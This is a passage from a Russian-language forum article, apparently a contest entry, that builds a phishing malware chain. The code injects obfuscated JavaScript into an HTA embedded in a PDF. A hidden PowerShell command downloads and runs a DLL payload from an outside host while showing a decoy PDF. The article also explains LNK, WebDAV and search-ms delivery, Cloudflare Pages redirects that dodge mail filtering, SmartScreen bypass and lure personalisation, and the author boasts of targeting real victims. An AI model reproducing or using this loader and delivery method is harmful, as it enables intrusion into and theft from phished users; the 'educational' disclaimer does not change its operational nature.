# ОБНОВЛЯЕМ ХТА
updated_hta_content = re.sub(
r'<script>.*?</script>',
lambda m: f'<script>{obfuscated_js}</script>',
full_hta_content,
count=1,
flags=re.DOTALL
)
# ФИНАЛЬНЫЙ ХТА
with open(hta_file_path, "w") as hta_file:
hta_file.write(updated_hta_content)
print("HTA file updated with obfuscated JavaScript content successfully.")
# ВСТАВКА В ПДФ
pdf_output_path = pdfinj_path.replace(".pdf", "_injected.pdf")
# ЧИТАЕМ ПДФ
with open(pdfinj_path, "rb") as pdfinj_file:
original_pdfinj_lines = pdfinj_file.readlines()
# ПРОВЕРЯЕМ РАЗМЕР ПДФ
if len(original_pdfinj_lines) >= 3:
# БЕРЕМ ПОСЛЕДНИЕ ТРИ ЛИНИИ
last_three_lines = original_pdfinj_lines[-3:]
# УБИРАЕМ ИХ
pdfinj_content_without_last_three = original_pdfinj_lines[:-3]
# ВСТАВЛЯЕМ ХТА В ПДФ
with open(pdf_output_path, "wb") as injected_pdf:
injected_pdf.writelines(pdfinj_content_without_last_three)
#
injected_pdf.write(updated_hta_content.encode())
# ДОБАВЛЯЕМ СЕПАРАТОР!
injected_pdf.write(b'\n')
# ВОЗВРАЩАЕМ ПОСЛЕДНИЕ ЛИНИИ
injected_pdf.writelines(last_three_lines)
print(f"PDF file injected and saved as: {pdf_output_path}")
else:
print("The injection target PDF file does not have enough lines to perform the injection.")
# УДАЛЯЕМ ПРОМЕЖУТКИ
try:
os.remove("hta.hta")
os.remove(contain_js_path)
print("Temporary files deleted successfully.")
except FileNotFoundError as e:
print(f"File not found: {e}")
except Exception as e:
print(f"Error deleting files: {e}")Как оно работает:
Берется стартовая команда. Как пример:
Code:
powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://cftc.us.org/files/PrivacyActRegulations2024-01684a.pdf', '$env:APPDATA\PrivacyActRegulations2024-01684a.pdf'); Start-Process '$env:APPDATA\PrivacyActRegulations2024-01684a.pdf' -WindowStyle Hidden; (New-Object System.Net.WebClient).DownloadFile('https://cftc.us.org/files/addons/chrome_wer.dll', '$env:TEMP\chrome_wer.dll'); Start-Process 'rundll32.exe' -ArgumentList '$env:TEMP\chrome_wer.dll,DllGo' -WindowStyle Hidden;"Данная команда запустит наш длл пейлоад (с калькулятором разумеется) и откроет НАСТОЯЩИЙ пдф декой. Который юзер и ожидает увидеть по ссылке.
Оборачивается через опенсурс обфускатор https://github.com/emdnaia/Babysteps АЙ ЛЮБЛЮ ТЕБЯ ХАРЛИ КВИН!
Далее инкапсуляция или как оно зовется, обход слэшей и кавычек для JS. Кто вообще этот язык придумал???
Потом обфусцируем стандартным js-обфускатором (https://obfuscator.io в питоне он есть библиотекой) и заливаем в хта схему, а далее крепим к ПДФ в правильном месте.
Опа и получаем зловещий ПДФ который хранит в себе наш лоадер. Или им и является. Тут все так быстро и легко написано, но сделать это рабочим, автоматизированным, для человека который за компьютер сел в среднем возрасте и не умел даже sqlmap запускать через python - было непросто и долго.
(вы можете изменить код на ехе, msi, да на всё что душе угодно. И разумеется поделиться с нами в комментах улучшенной версией)
Вот он тот самый пдф на который ссылается МХТА.ехе в нашем лнк.
Не забываем, что
!!!This code is for educational purposes only and should only be used on systems for which you have explicit permission to test.!!!
Фишим мы только с разрешения работодателя, начальника, командира, капитана. Цели на которые дали ДОБРО. Кто по странам снг,цис это будет юзать - ждет нещадный криптотермальноректальный анализатор.
5. Облака плывут, облака, Не спеша плывут как в кино.
Что мы хотим запустить? Калькулятор конечно же. Зашили его в лоадер, который в жс, который в хта, который в пдф, который вызывает мхта, через повершелл, который позвал конхост, через лнк, который на вебдаве, в который постучал сеарч-мс , который в мете, в хтмл. (Сказка про кощея прям)
Ну что нам осталось - совсем немного. Отправить эту ссылку на хтмл юзверю.
Можно этот этап пропустить. Но лучше не надо.
Рейтинг нашего домена скорее всего близится к нулю. DA - domain authority. Не путать с домен админом. Как будем исправлять? Делать редиректы на трастед доменах.
В пример возьмем Cloudlfare. Можно и на АВС - но меня там банят на ура. И по 5$ cписывают с виртаульной карты, и не возвращают (козлы).
Регаем там аккаунт и делаем PAGES. Визуально наш пейджес будет напоминать страницу антибота, проверки Клауда, где вас либо попросят щелкнуть по галочке, либо автоматически переведут на искомую веб страницу.
Опять же через боль, были получены оригиналы этих страниц и немного видоизменены. С автоматической проверкой темы браузера - чтобы не вызывать подозрений.
Данный линк при грамотном использовании ХТМЛ боди письма скрывается за хрефом и выглядит весьма легитимно. Гугл не ругается. Пропускает письма.
Образец в зип - index.html
Вот готова хтмл в ней в самом начале лишь:
HTML:
<meta http-equiv="refresh" content="2.22; url=https://www.cftc.us.org/PrivacyActRegulations2024-01684a.pdf"/>Остальное дело техники. Ну и не забудьте поменять cftc текстовые блоки на Ваш url
Бонусом идет скрипт для автоматического создания 100 cloudflare pages и коллекта линков , который Вы можете использовать.
DA - 98 . дописываем хвосты и ГОТОВО.
Образец в зип -
6. БЕДА, БЕДА, ОГОРЧЕНИЕ
Ничего идеального в мире нет. И тут не исключение - МОТВ на лнк в вебдаве. Юзеру всё равно придется кликнуть по маленькому окошку. Мол мы не знаем кто автор пдфки))
Мы успешно обходим смартскрин(!) этим методом. Но не мотву. Я пытался и зип, и лнк, и исо. Не получалось. Если вдруг кто-то найдет решение, поделитесь пожалуйста.
На практике - люди кликают, кликают даже те люди от которых не ожидаешь. Например бывший глава всей корейской биржи, серьезный дядя по факту. Он и ратник мой спалил на изи, чем меня привел к руткитам (спасибо ему большое и успехов в администрировании криптобота, которые я как раз выцеливал).
Ну и крайне буду признателен если кто-то доработает этот лоадер, сделает гуи и иные фишки. Пусть будет наш славный и опенсурсный (по репе, дате реги)) ) КысКысЛоадер - можно коллективно допиливать до идеала.
Как вас могут найти:
x.com
x.com
Не хостите все серваки у одного провайдера. Вот ребята быстро прикрыли вышеуказанные домены. Обозвали меня RedTeam (немножко приятно). В идеале работать с одной кампанией, дабы не распылять силы и средства. Персонализируйте письма на максимум. Давите на больное или на жажду наживы цели. Если долго мучаться, что-нибудь получится.
Как вы заметили сделан упор на технической стороне рыбалки. Всё остальное - дело личной фантазии и воображения.
7. Финиш.
Как завершить эту статью ...
Мне хотелось бы изначально поблагодарить форум XSS.is , уважаемую Администрацию форума, и его участников - за огромную базу знаний, обсуждения и споры которые приводят к истине и решениям.
Отдельное спасибо Луне за фин помощь и спонсорство в данном конкурсе.
Век живи. Век учись.
Всем успехов в конкурсе и по жизни!
НУ И КОНЕЧНО РЫБКУ ПОКРУПНЕЕ..
Содержание ЗИПА:
1. 000-conf - конфиг вебдава
2. giphy.gif - гифка от хантеров
3. baby66.ps1 - пвш обфускатор
4. FOBOS.py - лоадер
5. PHSMA .. lnk - образец лнк
6. https fx bulls - начало истории с мс-сеарч
7. index.html - клауд редирект
8.100redirects.py - автоматическое создание редиректов
9. METAPHSMA ... pdf.html - образец финальной версии фиш хтмл. - оп не влезает. Сделайте сами - в статье ВСЁ есть)
ZIP: https://xss.is/attachments/100036/
